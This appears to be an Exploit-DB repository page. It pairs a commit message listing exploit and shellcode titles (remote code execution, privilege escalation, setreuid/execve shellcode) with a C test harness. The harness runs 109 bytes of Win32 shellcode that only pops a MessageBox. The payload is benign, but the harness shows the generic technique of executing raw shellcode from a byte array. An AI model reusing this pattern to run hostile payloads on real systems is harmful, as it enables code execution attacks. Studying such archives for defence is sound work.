880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
33 lines
No EOL
1.2 KiB
C
33 lines
No EOL
1.2 KiB
C
/*
|
|
# Title : win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes
|
|
# Proof : http://img443.imageshack.us/img443/7900/proofaz.jpg
|
|
# Author : ZoRLu
|
|
# mail-msn : admin@yildirimordulari.com
|
|
# Home : z0rlu.blogspot.com
|
|
# Date : 14/09/2010
|
|
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
|
|
# Temenni : Yeni Anayasamiz Hayirli Olsun
|
|
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
|
|
int main(){
|
|
|
|
unsigned char shellcode[]=
|
|
"\x31\xc0\x31\xdb\x31\xd9\x31\xd2\xeb\x35\x59\x88\x51\x0a\xbb\x7b\x1d"
|
|
"\x80\x7c\x51\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x30"
|
|
"\xae\x80\x7c\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x07\x52\x52\x51\x52"
|
|
"\xff\xd0\x31\xd2\x50\xb8\xfa\xca\x81\x7c\xff\xd0\xe8\xc6\xff\xff\xff"
|
|
"\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc4\xff\xff\xff\x4d"
|
|
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc4\xff\xff\xff\x69"
|
|
"\x74\x73\x20\x6f\x6b\x21\xff";
|
|
|
|
printf("Size = %d bytes\n", strlen(shellcode));
|
|
|
|
((void (*)())shellcode)();
|
|
|
|
return 0;
|
|
} |